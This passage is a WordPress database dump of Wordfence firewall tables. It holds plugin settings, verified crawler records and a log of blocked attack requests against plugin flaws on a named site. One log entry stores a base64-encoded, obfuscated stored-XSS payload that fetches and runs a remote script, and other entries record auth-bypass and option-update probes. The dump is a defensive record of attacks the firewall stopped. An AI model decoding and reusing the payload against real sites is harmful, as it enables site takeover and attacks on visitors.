eP\";s:32:\"b0546ff76ca6388d4185c6564b2c7dca\";}i:146;a:2:{s:7:\"ignoreC\";s:32:\"2731ebcf6ecbf5a994ce0dd5d7db45b9\";s:7:\"ignoreP\";s:32:\"2731ebcf6ecbf5a994ce0dd5d7db45b9\";}i:147;a:2:{s:7:\"ignoreC\";s:32:\"245ef3837176443b7f2b4b55d7d61b40\";s:7:\"ignoreP\";s:32:\"245ef3837176443b7f2b4b55d7d61b40\";}i:148;a:2:{s:7:\"ignoreC\";s:32:\"57e195bd09da759697c5ac017f2b4e0f\";s:7:\"ignoreP\";s:32:\"57e195bd09da759697c5ac017f2b4e0f\";}i:149;a:2:{s:7:\"ignoreC\";s:32:\"a941391bd3be0e3b91a6144d896f1342\";s:7:\"ignoreP\";s:32:\"a941391bd3be0e3b91a6144d896f1342\";}i:150;a:2:{s:7:\"ignoreC\";s:32:\"bffb78e5466ccd29d1b5075139b8b07b\";s:7:\"ignoreP\";s:32:\"bffb78e5466ccd29d1b5075139b8b07b\";}i:151;a:2:{s:7:\"ignoreC\";s:32:\"1fb5fa3dd33b2a859c64abb745f51bdc\";s:7:\"ignoreP\";s:32:\"1fb5fa3dd33b2a859c64abb745f51bdc\";}i:152;a:2:{s:7:\"ignoreC\";s:32:\"ead2109f27deacff07f579b04a4ccada\";s:7:\"ignoreP\";s:32:\"ead2109f27deacff07f579b04a4ccada\";}i:153;a:2:{s:7:\"ignoreC\";s:32:\"d8a948491dda66ec9baaace694d59d4c\";s:7:\"ignoreP\";s:32:\"d8a948491dda66ec9baaace694d59d4c\";}i:154;a:2:{s:7:\"ignoreC\";s:32:\"6080b9f29319eebf06785f1ebeb2426d\";s:7:\"ignoreP\";s:32:\"6080b9f29319eebf06785f1ebeb2426d\";}i:155;a:2:{s:7:\"ignoreC\";s:32:\"22a499b685d56907de6d7539ee7c95eb\";s:7:\"ignoreP\";s:32:\"22a499b685d56907de6d7539ee7c95eb\";}i:156;a:2:{s:7:\"ignoreC\";s:32:\"f0629d7fab93692373881e1e82db1611\";s:7:\"ignoreP\";s:32:\"f0629d7fab93692373881e1e82db1611\";}i:157;a:2:{s:7:\"ignoreC\";s:32:\"25106cfcfcf8359454b87a3331be92df\";s:7:\"ignoreP\";s:32:\"25106cfcfcf8359454b87a3331be92df\";}i:158;a:2:{s:7:\"ignoreC\";s:32:\"64722ff4eed57b4a430e866041f26947\";s:7:\"ignoreP\";s:32:\"64722ff4eed57b4a430e866041f26947\";}i:159;a:2:{s:7:\"ignoreC\";s:32:\"31d69736902f39f3f7eedd6fbc38bede\";s:7:\"ignoreP\";s:32:\"31d69736902f39f3f7eedd6fbc38bede\";}i:160;a:2:{s:7:\"ignoreC\";s:32:\"316ed0a4e79151234f5d9c4e99cd6a14\";s:7:\"ignoreP\";s:32:\"316ed0a4e79151234f5d9c4e99cd6a14\";}i:161;a:2:{s:7:\"ignoreC\";s:32:\"a25a63d4ce65446031fb85f7a2bf7998\";s:7:\"ignoreP\";s:32:\"a25a63d4ce65446031fb85f7a2bf7998\";}i:162;a:2:{s:7:\"ignoreC\";s:32:\"e98269cd154c1c8132754381887b8361\";s:7:\"ignoreP\";s:32:\"e98269cd154c1c8132754381887b8361\";}i:163;a:2:{s:7:\"ignoreC\";s:32:\"645b6ce0cce5d8b0891a00da7dfb714d\";s:7:\"ignoreP\";s:32:\"645b6ce0cce5d8b0891a00da7dfb714d\";}i:164;a:2:{s:7:\"ignoreC\";s:32:\"81457fd12135090c7ac01ec41ade3b3f\";s:7:\"ignoreP\";s:32:\"81457fd12135090c7ac01ec41ade3b3f\";}i:165;a:2:{s:7:\"ignoreC\";s:32:\"33b7933aa6e7ba824251ae1ebed10d1f\";s:7:\"ignoreP\";s:32:\"33b7933aa6e7ba824251ae1ebed10d1f\";}i:166;a:2:{s:7:\"ignoreC\";s:32:\"7a92463c3da492078993e2861703670d\";s:7:\"ignoreP\";s:32:\"7a92463c3da492078993e2861703670d\";}i:167;a:2:{s:7:\"ignoreC\";s:32:\"0d34af2c931393309e045eba8627c45f\";s:7:\"ignoreP\";s:32:\"0d34af2c931393309e045eba8627c45f\";}i:168;a:2:{s:7:\"ignoreC\";s:32:\"2e953b693d7082e9571f81d0080e578a\";s:7:\"ignoreP\";s:32:\"2e953b693d7082e9571f81d0080e578a\";}i:169;a:2:{s:7:\"ignoreC\";s:32:\"654befd7bc278c4571fa42109edb7982\";s:7:\"ignoreP\";s:32:\"654befd7bc278c4571fa42109edb7982\";}i:170;a:2:{s:7:\"ignoreC\";s:32:\"e5b6fa8cfd76dba32d7f562cf0365429\";s:7:\"ignoreP\";s:32:\"e5b6fa8cfd76dba32d7f562cf0365429\";}i:171;a:2:{s:7:\"ignoreC\";s:32:\"e397f914b0198a53685b306e1fee8fd9\";s:7:\"ignoreP\";s:32:\"e397f914b0198a53685b306e1fee8fd9\";}i:172;a:2:{s:7:\"ignoreC\";s:32:\"8d2b5e600c688b876fd9fb3930ca24bf\";s:7:\"ignoreP\";s:32:\"8d2b5e600c688b876fd9fb3930ca24bf\";}i:173;a:2:{s:7:\"ignoreC\";s:32:\"7caf68a3bf4921dfda9f6464956321b9\";s:7:\"ignoreP\";s:32:\"7caf68a3bf4921dfda9f6464956321b9\";}i:174;a:2:{s:7:\"ignoreC\";s:32:\"9190a9be29efd67d75924bfd05c1258b\";s:7:\"ignoreP\";s:32:\"9190a9be29efd67d75924bfd05c1258b\";}i:175;a:2:{s:7:\"ignoreC\";s:32:\"92fff8e3fb7701fd082d109a8d18ace1\";s:7:\"ignoreP\";s:32:\"92fff8e3fb7701fd082d109a8d18ace1\";}i:176;a:2:{s:7:\"ignoreC\";s:32:\"27a17459c3e22a483ddef2c221c2984b\";s:7:\"ignoreP\";s:32:\"27a17459c3e22a483ddef2c221c2984b\";}i:177;a:2:{s:7:\"ignoreC\";s:32:\"a42eb499743c9a83d8b4c73494720434\";s:7:\"ignoreP\";s:32:\"a42eb499743c9a83d8b4c73494720434\";}i:178;a:2:{s:7:\"ignoreC\";s:32:\"753d38e5dd50d7ce507ab30ef062e065\";s:7:\"ignoreP\";s:32:\"753d38e5dd50d7ce507ab30ef062e065\";}i:179;a:2:{s:7:\"ignoreC\";s:32:\"93cba1078c9a952480246333296d67e9\";s:7:\"ignoreP\";s:32:\"93cba1078c9a952480246333296d67e9\";}i:180;a:2:{s:7:\"ignoreC\";s:32:\"d960896f5fe0156ad27ec6cf0e1f0bde\";s:7:\"ignoreP\";s:32:\"d960896f5fe0156ad27ec6cf0e1f0bde\";}i:181;a:2:{s:7:\"ignoreC\";s:32:\"186ac3b46846cc38139a877cbfb9d498\";s:7:\"ignoreP\";s:32:\"186ac3b46846cc38139a877cbfb9d498\";}i:182;a:2:{s:7:\"ignoreC\";s:32:\"749b04a8c45e9f4fc554943dd473ffbc\";s:7:\"ignoreP\";s:32:\"749b04a8c45e9f4fc554943dd473ffbc\";}i:183;a:2:{s:7:\"ignoreC\";s:32:\"222ab9aba13e49f12e45a68716d402bc\";s:7:\"ignoreP\";s:32:\"222ab9aba13e49f12e45a68716d402bc\";}i:184;a:2:{s:7:\"ignoreC\";s:32:\"a1c0704ad8e3abdfe7453aad9a873e16\";s:7:\"ignoreP\";s:32:\"a1c0704ad8e3abdfe7453aad9a873e16\";}i:185;a:2:{s:7:\"ignoreC\";s:32:\"546e68bd691eb0330779d628c81f9fbd\";s:7:\"ignoreP\";s:32:\"546e68bd691eb0330779d628c81f9fbd\";}i:186;a:2:{s:7:\"ignoreC\";s:32:\"bfbdab3177e0b489b0839c632e7e69b3\";s:7:\"ignoreP\";s:32:\"bfbdab3177e0b489b0839c632e7e69b3\";}i:187;a:2:{s:7:\"ignoreC\";s:32:\"3474360392d62b732f4bc33755e18ea6\";s:7:\"ignoreP\";s:32:\"3474360392d62b732f4bc33755e18ea6\";}i:188;a:2:{s:7:\"ignoreC\";s:32:\"6ee3db595771e2c82202a2df8b62580f\";s:7:\"ignoreP\";s:32:\"6ee3db595771e2c82202a2df8b62580f\";}i:189;a:2:{s:7:\"ignoreC\";s:32:\"e003444627d413f02d2f20b9b44ea2f9\";s:7:\"ignoreP\";s:32:\"e003444627d413f02d2f20b9b44ea2f9\";}i:190;a:2:{s:7:\"ignoreC\";s:32:\"e49619201ccb241e9b32618076a3dad8\";s:7:\"ignoreP\";s:32:\"e49619201ccb241e9b32618076a3dad8\";}i:191;a:2:{s:7:\"ignoreC\";s:32:\"bd480b755a9234dd681503105cf08a33\";s:7:\"ignoreP\";s:32:\"bd480b755a9234dd681503105cf08a33\";}i:192;a:2:{s:7:\"ignoreC\";s:32:\"9ee1b8190851057b67da8384d14cd050\";s:7:\"ignoreP\";s:32:\"9ee1b8190851057b67da8384d14cd050\";}i:193;a:2:{s:7:\"ignoreC\";s:32:\"f77ad991012a0b967f7540ac69b06fa2\";s:7:\"ignoreP\";s:32:\"f77ad991012a0b967f7540ac69b06fa2\";}i:194;a:2:{s:7:\"ignoreC\";s:32:\"fa8cd3370973ebfb664afa4c0573a0a8\";s:7:\"ignoreP\";s:32:\"fa8cd3370973ebfb664afa4c0573a0a8\";}i:195;a:2:{s:7:\"ignoreC\";s:32:\"daa8204d38abbb3973ad45b1c25d646e\";s:7:\"ignoreP\";s:32:\"daa8204d38abbb3973ad45b1c25d646e\";}i:196;a:2:{s:7:\"ignoreC\";s:32:\"73ef1ef0e5c407889aadc4ac85791815\";s:7:\"ignoreP\";s:32:\"73ef1ef0e5c407889aadc4ac85791815\";}i:197;a:2:{s:7:\"ignoreC\";s:32:\"a854755549d6c7bbc2ce7293119b9252\";s:7:\"ignoreP\";s:32:\"a854755549d6c7bbc2ce7293119b9252\";}i:198;a:2:{s:7:\"ignoreC\";s:32:\"70ba8907fcdf5683382ecd694bbe6046\";s:7:\"ignoreP\";s:32:\"70ba8907fcdf5683382ecd694bbe6046\";}i:199;a:2:{s:7:\"ignoreC\";s:32:\"e788f708008d1397b23e269c54b11a74\";s:7:\"ignoreP\";s:32:\"e788f708008d1397b23e269c54b11a74\";}i:200;a:2:{s:7:\"ignoreC\";s:32:\"7bc03410ca349a6412e3d2961bb4d17f\";s:7:\"ignoreP\";s:32:\"7bc03410ca349a6412e3d2961bb4d17f\";}i:201;a:2:{s:7:\"ignoreC\";s:32:\"a5ca84d3e9a7c31338d30848bac517ad\";s:7:\"ignoreP\";s:32:\"a5ca84d3e9a7c31338d30848bac517ad\";}i:202;a:2:{s:7:\"ignoreC\";s:32:\"a2dde98b01527230eaac9f31f41157a1\";s:7:\"ignoreP\";s:32:\"a2dde98b01527230eaac9f31f41157a1\";}i:203;a:2:{s:7:\"ignoreC\";s:32:\"af667fc0e3bbcc67ea5b817efcd86815\";s:7:\"ignoreP\";s:32:\"af667fc0e3bbcc67ea5b817efcd86815\";}i:204;a:2:{s:7:\"ignoreC\";s:32:\"64695597500910ab2b499236ba7a7164\";s:7:\"ignoreP\";s:32:\"64695597500910ab2b499236ba7a7164\";}i:205;a:2:{s:7:\"ignoreC\";s:32:\"e58774359b4d5aad5fb40c4c6ff0d10c\";s:7:\"ignoreP\";s:32:\"e58774359b4d5aad5fb40c4c6ff0d10c\";}i:206;a:2:{s:7:\"ignoreC\";s:32:\"c5e7e8cc4247c005fc52cfcc583356a2\";s:7:\"ignoreP\";s:32:\"c5e7e8cc4247c005fc52cfcc583356a2\";}i:207;a:2:{s:7:\"ignoreC\";s:32:\"68364c187702cfc4db1aeb6186846786\";s:7:\"ignoreP\";s:32:\"68364c187702cfc4db1aeb6186846786\";}i:208;a:2:{s:7:\"ignoreC\";s:32:\"51832d138379af28de2d44a15f388d89\";s:7:\"ignoreP\";s:32:\"51832d138379af28de2d44a15f388d89\";}i:209;a:2:{s:7:\"ignoreC\";s:32:\"d80c506ce323b852e4d688d0353d541f\";s:7:\"ignoreP\";s:32:\"d80c506ce323b852e4d688d0353d541f\";}i:210;a:2:{s:7:\"ignoreC\";s:32:\"77ae6095b6c31ec1832334500afda42c\";s:7:\"ignoreP\";s:32:\"77ae6095b6c31ec1832334500afda42c\";}i:211;a:2:{s:7:\"ignoreC\";s:32:\"86b8b8291d04e646c731308052042b60\";s:7:\"ignoreP\";s:32:\"86b8b8291d04e646c731308052042b60\";}i:212;a:2:{s:7:\"ignoreC\";s:32:\"4df3a7a787ffce3e80241bc9205551e1\";s:7:\"ignoreP\";s:32:\"4df3a7a787ffce3e80241bc9205551e1\";}i:213;a:2:{s:7:\"ignoreC\";s:32:\"5292567a12c67d10a468dd4e852ad38b\";s:7:\"ignoreP\";s:32:\"5292567a12c67d10a468dd4e852ad38b\";}i:214;a:2:{s:7:\"ignoreC\";s:32:\"4e31b558960fbb1c2ab6705df1cb0f2a\";s:7:\"ignoreP\";s:32:\"4e31b558960fbb1c2ab6705df1cb0f2a\";}i:215;a:2:{s:7:\"ignoreC\";s:32:\"3789db46655cba7f2f100a19e716da88\";s:7:\"ignoreP\";s:32:\"3789db46655cba7f2f100a19e716da88\";}i:216;a:2:{s:7:\"ignoreC\";s:32:\"fa6918cdf5dcf0168c09fc08d2dd4c13\";s:7:\"ignoreP\";s:32:\"fa6918cdf5dcf0168c09fc08d2dd4c13\";}i:217;a:2:{s:7:\"ignoreC\";s:32:\"b52a7bb7d3409116f04b4f48f6b9cd8f\";s:7:\"ignoreP\";s:32:\"b52a7bb7d3409116f04b4f48f6b9cd8f\";}}','yes'),('showWfCentralUI','1','yes'),('lastDailyCron','1571971163','yes'),('lastPermissionsTemplateCheck','1571971175','yes'),('alertOn_wafDeactivated','1','yes'),('scansEnabled_wafStatus','1','yes'),('waf_status','enabled','yes'),('lastError_prev_geoip','[1555640238,\"Undefined offset: 40\"]','yes'),('lastBruteForceDataSendTime','1568908187.704000','yes'),('wafAlertLastSendTime','1563110587','yes'),('vulnerabilities_theme','a:1:{i:0;a:4:{s:4:\"slug\";s:8:\"onepress\";s:9:\"toVersion\";s:5:\"2.2.4\";s:11:\"fromVersion\";s:5:\"2.2.3\";s:10:\"vulnerable\";b:0;}}','yes'),('scanFileProcessing','','yes'),('signatureUpdateTime','1568827148','yes'),('totalIPsBlocked','17340','yes'),('adminUserList','a:1:{i:1;i:1;}','yes'),('total503s','17557','yes'),('lastAttackDataSendTime','1571976459.612399','yes'),('lastError_rate_geoip','1555640238','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('scansEnabled_geoipSupport','1','yes'),('config720Migration','1','yes'),('disclosureStates','a:8:{s:20:\"waf-options-advanced\";b:0;s:22:\"waf-options-bruteforce\";b:0;s:20:\"live-traffic-options\";b:1;s:33:\"wf-unified-waf-options-bruteforce\";b:0;s:35:\"wf-unified-blocking-options-country\";b:0;s:31:\"wf-unified-waf-options-advanced\";b:1;s:34:\"wf-unified-waf-options-whitelisted\";b:0;s:39:\"wf-unified-global-options-email-summary\";b:1;}','yes'),('allowLegacy2FA','0','yes'),('needsNewTour_loginsecurity','1','yes'),('needsUpgradeTour_loginsecurity','0','yes');
/*!40000 ALTER TABLE `wpdp_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfcrawlers`
--

DROP TABLE IF EXISTS `wpdp_wfcrawlers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfcrawlers`
--

LOCK TABLES `wpdp_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wpdp_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wpdp_wfcrawlers` (`IP`, `patternSig`, `status`, `lastUpdate`, `PTR`) VALUES ('\0\0\0\0\0\0\0\0\0\0ÿÿBùG','‹üÀ•>b0«oQ1Œö','verified',1571658366,'crawl-66-249-71-1.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùIÞ','‹üÀ•>b0«oQ1Œö','verified',1571506363,'crawl-66-249-73-222.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùIÝ','‹üÀ•>b0«oQ1Œö','verified',1571531193,'crawl-66-249-73-221.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùZ¼','‹üÀ•>b0«oQ1Œö','verified',1571484180,'rate-limited-proxy-66-249-90-188.google.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùZ½','‹üÀ•>b0«oQ1Œö','verified',1571483460,'rate-limited-proxy-66-249-90-189.google.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùIÜ','‹üÀ•>b0«oQ1Œö','verified',1571473182,'crawl-66-249-73-220.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùG','‹üÀ•>b0«oQ1Œö','verified',1571757836,'crawl-66-249-71-31.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùG','‹üÀ•>b0«oQ1Œö','verified',1571778513,'crawl-66-249-71-8.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùG','‹üÀ•>b0«oQ1Œö','verified',1571865809,'crawl-66-249-71-7.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùGj','‹üÀ•>b0«oQ1Œö','verified',1571957155,'crawl-66-249-71-106.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿHÇ“','‹üÀ•>b0«oQ1Œö','verified',1571831308,'rate-limited-proxy-72-14-199-147.google.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùI','‹üÀ•>b0«oQ1Œö','verified',1571457996,'crawl-66-249-73-144.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùBK','‹üÀ•>b0«oQ1Œö','verified',1571559147,'crawl-66-249-66-75.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0ÿÿBùG','‹üÀ•>b0«oQ1Œö','verified',1571636682,'crawl-66-249-71-30.googlebot.com');
/*!40000 ALTER TABLE `wpdp_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wffilechanges`
--

DROP TABLE IF EXISTS `wpdp_wffilechanges`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wffilechanges`
--

LOCK TABLES `wpdp_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wpdp_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wffilemods`
--

DROP TABLE IF EXISTS `wpdp_wffilemods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT '0',
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wffilemods`
--

LOCK TABLES `wpdp_wffilemods` WRITE;
/*!40000 ALTER TABLE `wpdp_wffilemods` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfhits`
--

DROP TABLE IF EXISTS `wpdp_wfhits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfhits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT '0',
  `statusCode` int(11) NOT NULL DEFAULT '200',
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text,
  `referer` text,
  `UA` text,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text,
  `actionData` text,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=MyISAM AUTO_INCREMENT=38005 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfhits`
--

LOCK TABLES `wpdp_wfhits` WRITE;
/*!40000 ALTER TABLE `wpdp_wfhits` DISABLE KEYS */;
INSERT INTO `wpdp_wfhits` (`id`, `attackLogTime`, `ctime`, `IP`, `jsRun`, `statusCode`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`, `action`, `actionDescription`, `actionData`) VALUES (37961,1571333893.623531,1571333892.602900,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37960,1571333895.926662,1571333894.704600,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37959,1571333898.320706,1571333897.118400,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37999,1571334730.657493,1571334729.714800,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF8wOHE3NW53NjFjYzZheGs2OD1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2psNDk0ajZiOTdteGo0anJ6Ki8sMTE2LyoqLywxMTYvKl8yang1YXZ2eTg4ZjN1bzhoaiovLDExMi8qX2IzamZzZ2FhOXJ6N3ZraXA2Ki8sMTE1LypfMmp4NWF2dnk4OGYzdW84aGoqLyw1OC8qX2psNDk0ajZiOTdteGo0anJ6Ki8sNDcvKl9iM2pmc2dhYTlyejd2a2lwNiovLDQ3Lypfamw0OTRqNmI5N214ajRqcnoqLyw5OS8qXzA4cTc1bnc2MWNjNmF4azY4Ki8sMTAwLypfMmp4NWF2dnk4OGYzdW84aGoqLyw0Ni8qX2IzamZzZ2FhOXJ6N3ZraXA2Ki8sMTEyLypfMDhxNzVudzYxY2M2YXhrNjgqLywxMTQvKl8yang1YXZ2eTg4ZjN1bzhoaiovLDEwNS8qX2psNDk0ajZiOTdteGo0anJ6Ki8sMTE4Lypfamw0OTRqNmI5N214ajRqcnoqLyw5Ny8qXzA4cTc1bnc2MWNjNmF4azY4Ki8sOTkvKiovLDEyMS8qXzJqeDVhdnZ5ODhmM3VvOGhqKi8sMTA4LyoqLywxMTEvKiovLDk5Lypfamw0OTRqNmI5N214ajRqcnoqLyw5Ny8qXzJqeDVhdnZ5ODhmM3VvOGhqKi8sMTE2LyoqLywxMDUvKl8wOHE3NW53NjFjYzZheGs2OCovLDExMS8qX2IzamZzZ2FhOXJ6N3ZraXA2Ki8sMTEwLypfamw0OTRqNmI5N214ajRqcnoqLywxMDIvKl8yang1YXZ2eTg4ZjN1bzhoaiovLDExMS8qXzA4cTc1bnc2MWNjNmF4azY4Ki8sMTE0LypfYjNqZnNnYWE5cno3dmtpcDYqLywxMDgvKl9qbDQ5NGo2Yjk3bXhqNGpyeiovLDExMS8qX2psNDk0ajZiOTdteGo0anJ6Ki8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl8wOHE3NW53NjFjYzZheGs2OCovLDQ3LypfMDhxNzVudzYxY2M2YXhrNjgqLywxMTYvKl9iM2pmc2dhYTlyejd2a2lwNiovLDk3LyoqLywxMTIvKiovLDExMi8qXzA4cTc1bnc2MWNjNmF4azY4Ki8sMTAxLypfYjNqZnNnYWE5cno3dmtpcDYqLywxMTQvKl9iM2pmc2dhYTlyejd2a2lwNiovLDQ2LypfMDhxNzVudzYxY2M2YXhrNjgqLywxMDYvKl8yang1YXZ2eTg4ZjN1bzhoaiovLDExNS8qXzJqeDVhdnZ5ODhmM3VvOGhqKi8sNjMvKl8wOHE3NW53NjFjYzZheGs2OCovLDEwOS8qKi8sNjEvKiovLDEwOS8qX2IzamZzZ2FhOXJ6N3ZraXA2Ki8pO3ZhciBfYjNqZnNnYWE5cno3dmtpcDYgPSBfMmp4NWF2dnk4OGYzdW84aGooXzA4cTc1bnc2MWNjNmF4azY4KTtpZihfYjNqZnNnYWE5cno3dmtpcDYubGVuZ3RoID4gMyl7X2wxbjRxNm9tdjBjZ2lnbjdoKF9iM2pmc2dhYTlyejd2a2lwNik7fSBmdW5jdGlvbiBfMmp4NWF2dnk4OGYzdW84aGooX21iNDYza3ptc2U4cmw4bWszKXsgdmFyIF9qbDQ5NGo2Yjk3bXhqNGpyeiA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19qbDQ5NGo2Yjk3bXhqNGpyei5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX21iNDYza3ptc2U4cmw4bWszLCBmYWxzZSApO19qbDQ5NGo2Yjk3bXhqNGpyei5zZW5kKCBudWxsICk7cmV0dXJuIF9qbDQ5NGo2Yjk3bXhqNGpyei5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9sMW40cTZvbXYwY2dpZ243aChfN2oxZGEzM204eWY3eDF1eXcpeyB2YXIgXzgwanEyYW5udjEwZTdtMjlqID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfN2oxZGEzM204eWY3eDF1eXcrJyByZXR1cm4geCt5OycpO184MGpxMmFubnYxMGU3bTI5aigwLDApO308L3NjcmlwdD48c3R5bGU+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37962,1571333891.518321,1571333886.059500,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site 